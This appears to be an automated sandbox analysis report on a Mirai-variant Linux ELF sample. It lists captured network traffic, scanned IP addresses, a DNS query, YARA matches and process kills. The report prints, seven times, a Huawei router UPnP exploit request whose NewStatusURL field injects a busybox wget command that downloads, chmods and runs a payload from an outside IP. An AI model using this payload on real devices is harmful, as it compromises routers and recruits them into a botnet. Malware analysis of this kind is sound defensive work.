Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 460Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 37 30 2e 31 34 39 2e 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 3b 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.70.149.14 -l /tmp/.rebirth -r /mips; /bin/busybox chmod 777 /tmp/.rebirth; /tmp/.rebirth huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 460Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 37 30 2e 31 34 39 2e 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 3b 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.70.149.14 -l /tmp/.rebirth -r /mips; /bin/busybox chmod 777 /tmp/.rebirth; /tmp/.rebirth huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 460Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 37 30 2e 31 34 39 2e 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 3b 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.70.149.14 -l /tmp/.rebirth -r /mips; /bin/busybox chmod 777 /tmp/.rebirth; /tmp/.rebirth huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 460Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 37 30 2e 31 34 39 2e 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 3b 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.70.149.14 -l /tmp/.rebirth -r /mips; /bin/busybox chmod 777 /tmp/.rebirth; /tmp/.rebirth huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 460Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 37 30 2e 31 34 39 2e 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 3b 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.70.149.14 -l /tmp/.rebirth -r /mips; /bin/busybox chmod 777 /tmp/.rebirth; /tmp/.rebirth huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 460Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 37 30 2e 31 34 39 2e 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 3b 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.70.149.14 -l /tmp/.rebirth -r /mips; /bin/busybox chmod 777 /tmp/.rebirth; /tmp/.rebirth huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 460Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 37 30 2e 31 34 39 2e 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 3b 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.70.149.14 -l /tmp/.rebirth -r /mips; /bin/busybox chmod 777 /tmp/.rebirth; /tmp/.rebirth huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 157.43.138.117
Source: unknown	TCP traffic detected without corresponding DNS query: 197.199.46.51
Source: unknown	TCP traffic detected without corresponding DNS query: 220.45.152.133
Source: unknown	TCP traffic detected without corresponding DNS query: 197.202.20.211
Source: unknown	TCP traffic detected without corresponding DNS query: 197.226.217.5
Source: unknown	TCP traffic detected without corresponding DNS query: 197.148.57.191
Source: unknown	TCP traffic detected without corresponding DNS query: 157.82.58.188
Source: unknown	TCP traffic detected without corresponding DNS query: 157.90.182.81
Source: unknown	TCP traffic detected without corresponding DNS query: 157.177.191.34
Source: unknown	TCP traffic detected without corresponding DNS query: 185.43.20.146
Source: unknown	TCP traffic detected without corresponding DNS query: 84.113.211.26
Source: unknown	TCP traffic detected without corresponding DNS query: 197.218.51.50
Source: unknown	TCP traffic detected without corresponding DNS query: 41.71.199.98
Source: unknown	TCP traffic detected without corresponding DNS query: 105.71.149.211
Source: unknown	TCP traffic detected without corresponding DNS query: 41.223.217.46
Source: unknown	TCP traffic detected without corresponding DNS query: 205.100.192.28
Source: unknown	TCP traffic detected without corresponding DNS query: 198.104.199.41
Source: unknown	TCP traffic detected without corresponding DNS query: 104.190.185.49
Source: unknown	TCP traffic detected without corresponding DNS query: 157.170.156.84
Source: unknown	TCP traffic detected without corresponding DNS query: 41.178.248.140
Source: unknown	TCP traffic detected without corresponding DNS query: 157.251.62.132
Source: unknown	TCP traffic detected without corresponding DNS query: 82.153.137.13
Source: unknown	TCP traffic detected without corresponding DNS query: 157.157.159.18
Source: unknown	TCP traffic detected without corresponding DNS query: 157.53.30.248
Source: unknown	TCP traffic detected without corresponding DNS query: 41.138.254.90
Source: unknown	TCP traffic detected without corresponding DNS query: 157.57.129.112
Source: unknown	TCP traffic detected without corresponding DNS query: 41.121.183.43
Source: unknown	TCP traffic detected without corresponding DNS query: 64.235.3.161
Source: unknown	TCP traffic detected without corresponding DNS query: 157.137.17.160
Source: unknown	TCP traffic detected without corresponding DNS query: 97.172.198.64
Source: unknown	TCP traffic detected without corresponding DNS query: 197.23.242.135
Source: unknown	TCP traffic detected without corresponding DNS query: 183.18.78.201
Source: unknown	TCP traffic detected without corresponding DNS query: 41.134.38.202
Source: unknown	TCP traffic detected without corresponding DNS query: 197.74.204.95
Source: unknown	TCP traffic detected without corresponding DNS query: 197.171.71.249
Source: unknown	TCP traffic detected without corresponding DNS query: 197.109.56.254
Source: unknown	TCP traffic detected without corresponding DNS query: 101.247.147.46
Source: unknown	TCP traffic detected without corresponding DNS query: 147.19.19.242
Source: unknown	TCP traffic detected without corresponding DNS query: 41.117.192.227
Source: unknown	TCP traffic detected without corresponding DNS query: 157.63.15.50
Source: unknown	TCP traffic detected without corresponding DNS query: 197.24.122.140
Source: unknown	TCP traffic detected without corresponding DNS query: 41.57.158.162
Source: unknown	TCP traffic detected without corresponding DNS query: 197.92.235.136
Source: unknown	TCP traffic detected without corresponding DNS query: 41.77.179.171
Source: unknown	TCP traffic detected without corresponding DNS query: 135.200.78.17
Source: unknown	TCP traffic detected without corresponding DNS query: 158.6.148.254
Source: unknown	TCP traffic detected without corresponding DNS query: 197.109.141.56
Source: unknown	TCP traffic detected without corresponding DNS query: 197.93.140.110
Source: unknown	TCP traffic detected without corresponding DNS query: 197.54.89.212

Source: unknown

DNS traffic detected: queries for: security.rebirth-network.su

Source: unknown

Source: ul5RjxwWTK.elf, 6209.1.0000000008048000.000000000805f000.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: ul5RjxwWTK.elf, 6209.1.0000000008048000.000000000805f000.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: 6209.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_3a56423b Author: unknown
Source: 6209.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_dab39a25 Author: unknown

Sample tries to kill multiple processes (SIGKILL)

Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 772, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1532, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1601, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1622, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1633, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1638, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1664, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1877, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1983, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2074, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2126, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2146, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2223, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2302, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 4333, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 4438, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6185, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6215, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6237, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6235, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6239, result: successful	Jump to behavior
